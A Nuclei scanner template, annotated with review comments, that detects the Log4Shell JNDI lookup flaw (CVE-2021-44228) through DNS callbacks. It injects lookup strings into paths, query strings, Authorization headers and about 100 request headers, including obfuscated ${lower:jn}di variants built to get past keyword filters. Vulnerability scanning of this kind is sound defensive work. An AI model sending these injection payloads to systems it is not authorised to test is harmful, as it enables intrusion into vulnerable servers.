Nuclei template to scan for Log4Shell (CVE-2021-44228).
# Nuclei template: out-of-band detection of the Log4j JNDI lookup (CVE-2021-44228).
#
# How detection works here: every request below places a `${jndi:dns://<interactsh-url>:80/...`
# lookup string in the path, a query string, an Authorization header or one of ~100 other
# request headers. The only signal checked is whether the interactsh callback host observed a
# DNS interaction (`part: interactsh_protocol`, word "dns"). Nothing in the response body is
# inspected and no LDAP/RMI class is loaded, so a match means "this endpoint evaluated the
# lookup string and could resolve an external name", not "code execution confirmed".
# Conversely, a negative result is not proof of absence: the probe only covers GET, the
# path/query and the header names listed, and only the DNS scheme.
#
# NOTE(review): the lookup strings end in `:80/d` / `:80/o` with no closing `}` (compare the
# fully closed `${lower:jn}` fragments). Confirm whether the brace was dropped in rendering or is
# genuinely absent, because an unclosed lookup may never be evaluated and would yield a silent
# false negative.
#
# `requests:` is the older Nuclei key for what newer releases call `http:`; the rest of the
# layout is standard (one `raw` request block, optional `payloads`, then matchers).
id: CVE-2021-44228

info:
  name: Log4J RCE
  author: iNvist / hazcod
  severity: critical
  description: CVE-2021-44228

requests:
  # Probe 1: lookup string appended directly to the path.
  - raw:
      - |
        GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    # `or` with a single matcher has no effect; harmless.
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 2: same as probe 1 with a leading `//` — presumably to reach handlers that
  # normalise the path differently (verify against the intended targets).
  - raw:
      - |
        GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 3: path variant with the scheme/keyword assembled via nested `${lower:..}` lookups,
  # so a plain substring filter on "jndi" does not match the request.
  - raw:
      - |
        GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 4: probe 3 with the leading `//`.
  - raw:
      - |
        GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # TODO maybe encoding
  # Probe 5: lookup string in the query string.
  # NOTE(review): `s:://` has an extra colon compared with every other probe — confirm it is
  # intentional rather than a typo, otherwise this probe is dead weight.
  - raw:
      - |
        GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 6: lookup string as the credential part of an Authorization header, once per
  # auth scheme in `payloads.auth_type` (4 requests).
  # NOTE(review): `{{auth_type }}` carries a trailing space inside the marker. Confirm the
  # engine tolerates it; if not, the header is sent with the literal marker text and this
  # probe can never produce a signal.
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 7: probe 6 with the leading `//`. Same `{{auth_type }}` caveat as above.
  - raw:
      - |
        GET //{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 8: Authorization header with the `${lower:..}`-assembled lookup.
  # Same `{{auth_type }}` caveat as above.
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
      auth_type:
        - Bearer
        - Oauth
        - Token
        - Basic
    # Here `or` matters: either matcher below is enough to report a hit.
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
      # NOTE(review): the lookup uses the dns:// scheme, so the recorded interaction is a DNS
      # query; "JRMP" (an RMI-protocol marker) is unlikely to appear in it. Confirm this matcher
      # is reachable or drop it to keep the template honest about what it can observe.
      - type: regex
        part: interactsh_request
        regex:
          - "JRMP"
  # Probe 9: `${lower:..}`-assembled lookup placed as the value of each header name in
  # `payloads.header_val` (100 names → 100 requests per target). `§header_val§` is the
  # legacy Nuclei marker syntax for substitution inside raw requests.
  # NOTE(review): the list includes `Host`, which produces a request with two Host headers;
  # servers may reject it outright, so that iteration is likely wasted.
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
      header_val:
        - Accept
        - Accept-Charset
        - Accept-Datetime
        - Accept-Encoding
        - Accept-Language
        - Alt-Svc
        - Base-Url
        - CF-Connecting-IP
        - Cache-Control
        - Client-IP
        - Cluster
        - Cluster-Client-IP
        - Connection
        - Contact
        - Content-Length
        - Content-MD5
        - Content-Type
        - Cookie
        - DNT
        - Date
        - Destination
        - Expect
        - Forwarded
        - From
        - Front-End-Https
        - HTTP_CLIENT_IP
        - HTTP_FORWARDED
        - HTTP_FORWARDED_FOR
        - HTTP_X_FORWARDED
        - HTTP_X_FORWARDED_FOR
        - Host
        - Http-Url
        - If-Match
        - If-Modified-Since
        - If-None-Match
        - If-Range
        - If-Unmodified-Since
        - Link
        - Location
        - Max-Forwards
        - Origin
        - Pragma
        - Profile
        - Proxy
        - Proxy-Authorization
        - Proxy-Connection
        - Proxy-Host
        - Proxy-Url
        - Range
        - Real-IP
        - Redirect
        - Referer
        - Referrer
        - Refferer
        - Request-Uri
        - TE
        - True-Client-IP
        - UID
        - Upgrade
        - Uri
        - User-Agent
        - Via
        - Warning
        - X-ATT-DeviceId
        - X-Arbitrary
        - X-CSRFToken
        - X-Client-IP
        - X-Cluster-Client-IP
        - X-Correlation-ID
        - X-Csrf-Token
        - X-Do-Not-Track
        - X-Forward-For
        - X-Forwarded
        - X-Forwarded-By
        - X-Forwarded-For
        - X-Forwarded-For-IP
        - X-Forwarded-For-Original
        - X-Forwarded-Host
        - X-Forwarded-Proto
        - X-Forwarded-Server
        - X-Forwarder-For
        - X-Host
        - X-Http-Destinationurl
        - X-Http-Host-Override
        - X-Http-Method-Override
        - X-Original-Remote-Addr
        - X-Original-Url
        - X-Originating-IP
        - X-Proxy-Url
        - X-ProxyUser-IP
        - X-Real-IP
        - X-Remote-Addr
        - X-Remote-IP
        - X-Request-ID
        - X-Requested-With
        - X-Rewrite-Url
        - X-True-IP
        - X-UIDH
        - X-Wap-Profile
        - X-XSRF-TOKEN
    # With a single payload set, clusterbomb degenerates to a plain iteration over the list;
    # budget the request volume (and any rate limiting) accordingly.
    attack: clusterbomb
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
  # Probe 10: same header sweep as probe 9 with the plain `${jndi:dns://` lookup
  # (another 100 requests per target). Same `Host` caveat as above.
  - raw:
      - |
        GET /{{Path}} HTTP/1.1
        Host: {{Hostname}}
        §header_val§: ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
      header_val:
        - Accept
        - Accept-Charset
        - Accept-Datetime
        - Accept-Encoding
        - Accept-Language
        - Alt-Svc
        - Base-Url
        - CF-Connecting-IP
        - Cache-Control
        - Client-IP
        - Cluster
        - Cluster-Client-IP
        - Connection
        - Contact
        - Content-Length
        - Content-MD5
        - Content-Type
        - Cookie
        - DNT
        - Date
        - Destination
        - Expect
        - Forwarded
        - From
        - Front-End-Https
        - HTTP_CLIENT_IP
        - HTTP_FORWARDED
        - HTTP_FORWARDED_FOR
        - HTTP_X_FORWARDED
        - HTTP_X_FORWARDED_FOR
        - Host
        - Http-Url
        - If-Match
        - If-Modified-Since
        - If-None-Match
        - If-Range
        - If-Unmodified-Since
        - Link
        - Location
        - Max-Forwards
        - Origin
        - Pragma
        - Profile
        - Proxy
        - Proxy-Authorization
        - Proxy-Connection
        - Proxy-Host
        - Proxy-Url
        - Range
        - Real-IP
        - Redirect
        - Referer
        - Referrer
        - Refferer
        - Request-Uri
        - TE
        - True-Client-IP
        - UID
        - Upgrade
        - Uri
        - User-Agent
        - Via
        - Warning
        - X-ATT-DeviceId
        - X-Arbitrary
        - X-CSRFToken
        - X-Client-IP
        - X-Cluster-Client-IP
        - X-Correlation-ID
        - X-Csrf-Token
        - X-Do-Not-Track
        - X-Forward-For
        - X-Forwarded
        - X-Forwarded-By
        - X-Forwarded-For
        - X-Forwarded-For-IP
        - X-Forwarded-For-Original
        - X-Forwarded-Host
        - X-Forwarded-Proto
        - X-Forwarded-Server
        - X-Forwarder-For
        - X-Host
        - X-Http-Destinationurl
        - X-Http-Host-Override
        - X-Http-Method-Override
        - X-Original-Remote-Addr
        - X-Original-Url
        - X-Originating-IP
        - X-Proxy-Url
        - X-ProxyUser-IP
        - X-Real-IP
        - X-Remote-Addr
        - X-Remote-IP
        - X-Request-ID
        - X-Requested-With
        - X-Rewrite-Url
        - X-True-IP
        - X-UIDH
        - X-Wap-Profile
        - X-XSRF-TOKEN
    attack: clusterbomb
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"